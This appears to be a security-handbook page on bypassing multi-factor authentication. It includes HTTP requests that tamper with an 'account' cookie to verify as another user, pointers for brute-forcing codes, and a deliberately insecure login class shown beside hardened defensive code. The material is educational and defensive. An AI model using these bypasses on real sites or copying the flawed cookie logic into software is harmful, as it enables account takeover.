handbook/tools/3.Web-Hacking/3.Business-Logic/Authentification-Vulnerability/Notes/2.Multi-factor-Authentication.md
2024-08-31 01:07:22 +02:00

Multi-Factor Authentication

Two-Factor Authentication Tokens

  • Some websites send a verification code via a dedicated device or app (such as Google Authenticator)
  • Other websites send a code via text message, which is open to abuse:
      • the code is transmitted over SMS rather than generated on the device itself
      • the code can be intercepted via SIM swapping, among other means

Bypassing Two-Factor Authentication

  • Try to go to "logged in pages" without entering the code -- you might be able to bypass MFA completely

Flawed Two-Factor Verification Logic

  1. User logs in with normal credentials

```http
POST /login-steps/first HTTP/1.1
Host: vulnerable-website.com
...
username=carlos&password=qwerty
```

  2. User is assigned a cookie that relates to their account, before being taken to the second step of the login process

```http
HTTP/1.1 200 OK
Set-Cookie: account=carlos
```

```http
GET /login-steps/second HTTP/1.1
Cookie: account=carlos
```

  3. When submitting the verification code, the request uses this cookie to determine which account the user is trying to access

```http
POST /login-steps/second HTTP/1.1
Host: vulnerable-website.com
Cookie: account=carlos
...
verification-code=123456
```

  4. You can change the "account" cookie to any username when submitting the code

```http
POST /login-steps/second HTTP/1.1
Host: vulnerable-website.com
Cookie: account=victim-user
...
verification-code=123456
```
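The two bypasses above (skipping to a logged-in page after step one, and editing the `account` cookie before submitting the code) both come from the same design mistake: the server lets the client's request decide which account is being verified and whether verification happened. The following is an added example, not code from the notes or from PortSwigger, that models the flawed two-step login beside a hardened version and replays both abuses against each. The user store, passwords and codes are constructed sample values; `VulnerableLogin`, `HardenedLogin` and `replay` are names chosen for this example.

```python
import hmac
import secrets

# Constructed sample user store for this example (plaintext values only to keep
# the demo short; a real store holds password hashes and per-user MFA secrets).
USERS = {
    "carlos": {"password": "qwerty", "mfa_code": "123456"},
    "victim-user": {"password": "hunter2", "mfa_code": "654321"},
}


class VulnerableLogin:
    """Reproduces the flawed flow from the notes: step two trusts the
    client-editable 'account' cookie, and the logged-in page only checks
    that such a cookie is present."""

    def step_one(self, username, password):
        user = USERS.get(username)
        if user is None or user["password"] != password:
            return None
        return {"account": username}          # Set-Cookie: account=<username>

    def step_two(self, cookies, code):
        account = cookies.get("account")      # taken from the request: client-controlled
        user = USERS.get(account)
        if user is None or user["mfa_code"] != code:
            return None
        return {"account": account}

    def my_account(self, cookies):
        # Never checks whether step two was completed for this account.
        return cookies.get("account")


class HardenedLogin:
    """Keeps the login state server-side. The client only holds an opaque,
    random session id; the account under verification and the MFA-complete
    flag are set by the server and cannot be edited from the request."""

    def __init__(self):
        self._sessions = {}   # session id -> {"account": str, "mfa_complete": bool}

    def _session(self, cookies):
        return self._sessions.get(cookies.get("session", ""))

    def step_one(self, username, password):
        user = USERS.get(username)
        if user is None or not hmac.compare_digest(user["password"], password):
            return None
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"account": username, "mfa_complete": False}
        return {"session": sid}

    def step_two(self, cookies, code):
        sess = self._session(cookies)
        if sess is None:
            return None
        user = USERS[sess["account"]]         # bound at step one, not read from the request
        if not hmac.compare_digest(user["mfa_code"], code):
            return None
        sess["mfa_complete"] = True
        return dict(cookies)

    def my_account(self, cookies):
        sess = self._session(cookies)
        if sess is None or not sess["mfa_complete"]:
            return None                       # not fully authenticated: send back to login
        return sess["account"]


def replay(impl):
    """Replays the two abuses from the notes against one implementation and
    reports which account each request ended up acting as (None = refused)."""
    cookies = impl.step_one("carlos", "qwerty")
    # Abuse 1: request a logged-in page straight after step one.
    skipped = impl.my_account(cookies)
    # Abuse 2: overwrite every cookie value with another user's name before step two.
    tampered = {name: "victim-user" for name in cookies}
    swapped = impl.step_two(tampered, USERS["victim-user"]["mfa_code"])
    swapped_account = impl.my_account(swapped) if swapped else None
    # Legitimate completion of the flow, for comparison.
    done = impl.step_two(cookies, USERS["carlos"]["mfa_code"])
    legit = impl.my_account(done) if done else None
    return {"skipped": skipped, "swapped": swapped_account, "legit": legit}
```

`replay(VulnerableLogin())` reports the logged-in page served without a code and the second step completed as `victim-user`; `replay(HardenedLogin())` refuses both while the legitimate flow still ends as `carlos`. The fix is not a smarter cookie check but moving the state off the client: the only value the browser holds is a random session id that indexes server-side state.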

Brute-forcing 2FA Verification Codes

  • This can be automated by creating macros for Burp Intruder
  • This can also be done with the Turbo Intruder extension
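Brute-forcing only works because a six-digit code gives a million guesses and nothing stops the guesser. The server-side control is to budget attempts per pending login, make each code single-use, and expire it. The block below is an added example, not code from the notes or from Burp Suite; `MfaVerifier`, the attempt budget and the time-to-live are choices made for this example, and the clock is injectable so the expiry path can be exercised without waiting.

```python
import hmac
import secrets
import time

MAX_ATTEMPTS = 5         # failed code submissions allowed per pending login (example value)
CODE_TTL_SECONDS = 300   # a pending code expires after five minutes (example value)


class MfaVerifier:
    """Holds one pending verification code per server-side session and stops
    accepting submissions once the attempt budget is spent, so the code
    space cannot be enumerated with an Intruder-style loop."""

    def __init__(self, now=time.time):
        self._now = now       # injectable clock, used by the tests below
        self._pending = {}    # session id -> {"code": str, "attempts": int, "issued": float}

    def issue(self, session_id):
        """Generate and record a fresh random six-digit code for this session."""
        code = f"{secrets.randbelow(10**6):06d}"
        self._pending[session_id] = {"code": code, "attempts": 0, "issued": self._now()}
        return code

    def verify(self, session_id, submitted):
        """Return one of: ok, wrong, locked, expired, no_pending."""
        entry = self._pending.get(session_id)
        if entry is None:
            return "no_pending"
        if self._now() - entry["issued"] > CODE_TTL_SECONDS:
            del self._pending[session_id]
            return "expired"
        entry["attempts"] += 1
        if hmac.compare_digest(entry["code"], submitted):
            del self._pending[session_id]      # single use: a replayed code is refused
            return "ok"
        if entry["attempts"] >= MAX_ATTEMPTS:
            del self._pending[session_id]      # budget spent: the whole login must restart
            return "locked"
        return "wrong"

    def attempts_remaining(self, session_id):
        entry = self._pending.get(session_id)
        return 0 if entry is None else MAX_ATTEMPTS - entry["attempts"]
```

With this in place a guessing loop gets at most `MAX_ATTEMPTS` responses per login before the code is discarded, and restarting the login issues a new random code, so earlier guesses carry no information forward. Pair the per-session budget with per-account and per-source-IP counters in the web layer, since the session id itself is under the client's control.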